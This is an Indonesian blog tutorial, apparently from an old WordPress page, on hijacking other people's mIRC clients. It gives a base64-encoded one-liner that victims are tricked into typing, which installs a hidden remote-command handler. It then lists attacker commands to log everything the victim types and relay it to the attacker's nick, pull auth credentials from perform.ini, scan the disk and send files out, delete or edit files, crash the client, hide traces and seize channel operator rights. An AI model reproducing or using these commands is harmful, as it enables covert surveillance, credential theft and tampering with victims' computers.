Meremote lawan Chat di MIrc

Pendahuluan
Dulu di sebuah majalah bernama neotek http://www.neotek.co.id ada sebuah script yang dibahas beberapa kali. Gunascript ini adalah melakukan spying pada mIRC orang lain dan melihat apayang type disana. Script ini begitu terlihat hebat pada saat itu. Tapiternyata masih kurang efektif, mengingat si penyerang harus secaramanual mengetikan script penyadap itu ke dalam remote text mIRC sivictim.

Pada kesempatan kali ini, kita akan sedikit bahas yang namanya Trully Remote Access pada mIRC.
Bagaimana cara kerjanya?? Bener bener Remote kah?? Seringgak sih kalian dapat spam bot untuk mengetikan sebuah code tertentu?? Dan biasanya dijanjikan akan dapat men-take over channel orang lain dimIRC? Kalau sering, yah tentunya sudah tahu apa yang harus dilakukandengan code tersebut .. Hehehe ..

Bagi yang belum pernah tahu. Adasebuah cara dimana anda akan dapat melakukan “Remote Access” padakomputer orang lain melalui mIRC, dan hanya perlu dilakukan dengan caramembuat si victim percaya untuk mengetikan sebuah code. Code apakahitu??
CODE

//write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IG hhbHRkZWYgfQ==,m) | .load -rs czm.mrc | msg i love you <!–more–> adalah tempat anda menaruhkan nick yang anda miliki pada sebuah IRC serverdimana anda bermain. Anda bisa juga menghilangkan bagian “| msg i loveyou” untuk membuat si victim tidak mengirimkan kalimat itu disaatpertama dia mengetikan code. Atau apabila anda ingin menggantinya pun,anda bisa melakukan hal itu. Just be creative !!!
Sebenarnya apa sih arti daripada code tersebut??!
Sayajuga doeloe waktu pertama kali mainan mIRC gak tau menahu, sebenernyaapa sih hal kayak bgituan?? Kenapa sih koq dengan ngetik itu komputerkita isa ke take over sama orang?? Memang itu code artinya apa??
Setelahbertapa lama (Cie ileh makek bertapa), akhirnya saya mengerti bahwa ituadalah Base64 Encoding dan sebenernya arti daripada code diatas ituadalah:CODE

on ^*:text:ins*:?:{ . $+ $2- | haltdef }

Dimanabrarti juga bahwa setiap message dari anda kepada victim anda yangdimulai dengan kata “ins” akan di block, sehingga si victim tidak akantahu command yang anda ketikan kepada dia.

Contoh:
/msg ins msg #sate hi

Denganmenggunakan command diatas anda melakukan perintah kepada victim andauntuk mengetikan kata “hi” di channel yang bernama #sate
Lalu apa yg bisa kita lakukan dengan itu?? Apa hanya demikian??
Weits.. Tidak .. !!! Masih banyak cara lain yang bisa anda lakukan,contohnya adalah melakukan spying pada victim, melihat semua yang diaketik dan lain sebagainya. Tak percaya?? Ketikanlah code berikutsetelah victim ter-injeksi:CODE

/msg victim ins write -c myscript.mrc
/msg victim ins unload -rs myscript.mrc
/msg victim insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
/msgvictim ins write myscript.mrc on *:TEXT:*:*: { .msg YOURNICK $timestamp<- < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ > $1- }
/msgvictim ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp-> $iif($left($1,1) != /,< $+ $me $+ >,[COMMAND]) $1- }
/msg victim ins load -rs myscript.mrc

Note: Dimana victim adalah nickname korban anda dan YOURNICK adalah nick anda sendiri dalam IRC Server yang sama

Anda juga dapat berhenti melakukan spying dengan cara mengetikan code ini:
/msg victim ins unload -rs myscript.mrc

Terkadanganda juga ingin melakukan pengintaian hanya setengah2. Maksud saya,misalnya anda ingin melihat apa sih yang dia ketikan di privatemessages, tapi anda tidak ingin mendapatkan apa yang dia bicarakan dichannel, itu bisa diakalin dengan code berikut ini:CODE

/msg victim ins write -c myscript.mrc
/msg victim ins unload -rs myscript.mrc
/msg victim insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
/msg victim ins write myscript.mrc on *:TEXT:*:?:Question { .msg YOURNICK $timestamp <- < $+ $nick $+ > $1- }
/msgvictim ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp-> $iif($left($1,1) != /,< $+ $me $+ >,[COMMAND]) $1- }
/msg victim ins load -rs myscript.mrc

Bahkan anda juga bisa menjadikannya semacam BOT anda di mIRC dengan sedikit trick seperti ini:CODE

/msg victim insert write -c testing.mrc on 1:TEXT:*!opme*:#CHANNEL:/mode #channel +o $nick
/msg victim ins .load –rs testing.mrc

Dimanadia akan melakukan pemberian Operator access pada anda (+o) di channeldimana dia OP dan anda mengetikan “!opme” (Tanpa kutip).

Berikut adalah list command yang bisa anda lakukan:
REMOVE FILE :
/msg victim ins remove C:Textfile.txt

OPEN SITE:
/msg victim ins url http://www.site.com

JOIN CHANNEL:
/msg victim ins join #channel

PART CHANNEL:
/msg victim ins part #channel

QUERY USER:
/msg victim ins query user

MSG USER:
/msg victim ins msg user

INVITE USER:
/msg victim ins invite user #channel

BAN USER:
/msg victim ins ban #channel user

KICK USER:
/msg victim ins kick #channel user

IGNORE USER:
/msg victim ins ignore *!*@host.com

UNIGNORE USER:
/msg victim ins unignore *!*@host.com

CHANGE NICK:
/msg victim ins nick thenickyouwant

OP USER:
/msg victim ins mode #channel +o user

VOICE USER:
/msg victim ins mode #channel +v user

CHANGE TOPIC:
/msg victim ins topic #channel text

RECEIVE FILE:
/msg victim ins dcc send user file
or
/msg victim ins dcc send user C:something.sth

EDIT TEXT:
/msg victim ins write -l1 C:TESTING.txt thetextyouwanttoedit
(-l1 –> first line)

READ A PIECE OF FILE (LIKE PERFORM):
following commands must be executed after eachother:
/msg victim ins write mab alias abcd123 { msg user $read(perform.ini,w,*auth*) }
/msg victim ins .load -rs mab
/msg victim ins abcd123

SEARCH HARD DISK FOR A FILE:
/msg victim ins write MAB1 alias MAB1 { .echo $findfile(C:,porn.*,0,msg user $1-) }
/msg victim ins .load -rs MAB1
/msg victim ins MAB1

LET HIS mIRC CRASH:
/msg victim ins write MAB2 alias MAB2 { while (1 != 2) { beep } }
/msg victim ins .load -rs MAB2
/msg victim ins MAB2

SCAN HIS HARD DISK AND SAVE IT AS .txt:
//echo $findfile(c:,*.*,0,write C:M_A_B.txt $1-)
/msg victim ins dcc send YOURNICK C:M_A_B.txt

/msgvictim write MyNewScript.mrc$decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IG hhbHRkZWYgfQ==,m) |.load -rs MyNewScript.mrc

TURN THE AUTO JOIN ON INVITE ON (or OFF)
/msg victim ins ajinvite on

LET THE VICTIM MESSAGE SOMETHING ON ALL THE CHANNELS HE IS ON:
/msg victim ins amsg

CHANGE THE VICTIMs ALTERNATIVE NICK:
/msg victim ins anick

CHANGE THE VICTIMs BACKGROUND PICTURE:
/msg victim ins background [-aemsgdluhcfnrtpx] [window] [filename]
with
-a = active window
-m = main mIRC window
-s = status window
-g = finger window
-d = single message window
-e = set as default
-cfnrtp = center, fill, normal, stretch, tile, photo
-l = toolbar
-u = toolbar buttons
-h = switchbar
-x = no background picture

LET THE “mIRC CHANNEL CENTRAL” OF A CHANNEL POP UP:
/msg victim ins channel #CHANNELNAME

Note: sang korban harus ada pada #CHANNELNAME

CLEAR YOUR TRACKS BY CLEARING THE TEXT ON THE OPEN WINDOWS:
/msg victim ins clearall [-snqmtgu]
s = status, n = channel, q = query, m = message window, t = chat, g = finger, u = custom.

LET THE VICTIM CLIPBOARD A SPECIFIED TEXT:
/msg victim ins clipboard

CLOSE THE OPEN QUERIES OF THE VICTIM:
/msg victim ins close

LET THE VICTIM QUIT mIRC:
/msg victim ins quit

LET THE VICTIM DISCONNECT FROM SERVER:
/msg victim ins disconnect

LET THE VICTIM CHANGE SERVER:
/msg victim ins server the.server.you.want

LET THE VICTIM OPEN A NEW SERVER NEXT TO THE SERVER HE IS ALREADY IN:
/msg victim ins server -m
/msg victim ins server the.server.you.want

LET THE VICTIM GIVE YOU FLAGS (if he is able to):
/msg victim ins msg |TheBot| chanlev #channel YOURNICK +flag
Note:
|TheBot| = the bot who can give flags
Chanlev = can be different, sometimes it is also, “adduser”
flag = the flag you want
YOURNICK = your nick

CHANGE THE VICTIMs FONT AND FONT SIZE:
/msg victim ins font -asgbd

CHANGE THE VICTIMs FULL NAME:
/msg victim ins fullname

LET THE VICTIM REJOIN A CHANNEL:
/msg victim ins hop #CHANNEL

MAKE A NEW DIRECTORY ON THE VICITMs HARD DISK:
/msg victim ins mkdir
NOTE:
victim = nick of the victim
user = your nick

Sekian~

Note:Ini juga merupakan sebuah pembuktian bahwa, dengan hanya menggunakanmIRC kita bisa membuat sebuah trojan yang langsung melakukanpenyerangan ke komputer lawan. Terbukti dengan access yang kita dapatuntuk men-delete dan memanipulasi berbagai hal di komputer sang korban.


1 Comment

  1. saya baru mengenal chat di mirc blom mengerti tentang istilah2 dr chat ini tolong di kirim diperjelas lagi tentang chat ini. apa itu floot??? apa tu bot??? dlll kirim ke email saya doni_st71@yahoo.com


Comments RSS TrackBack Identifier URI

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s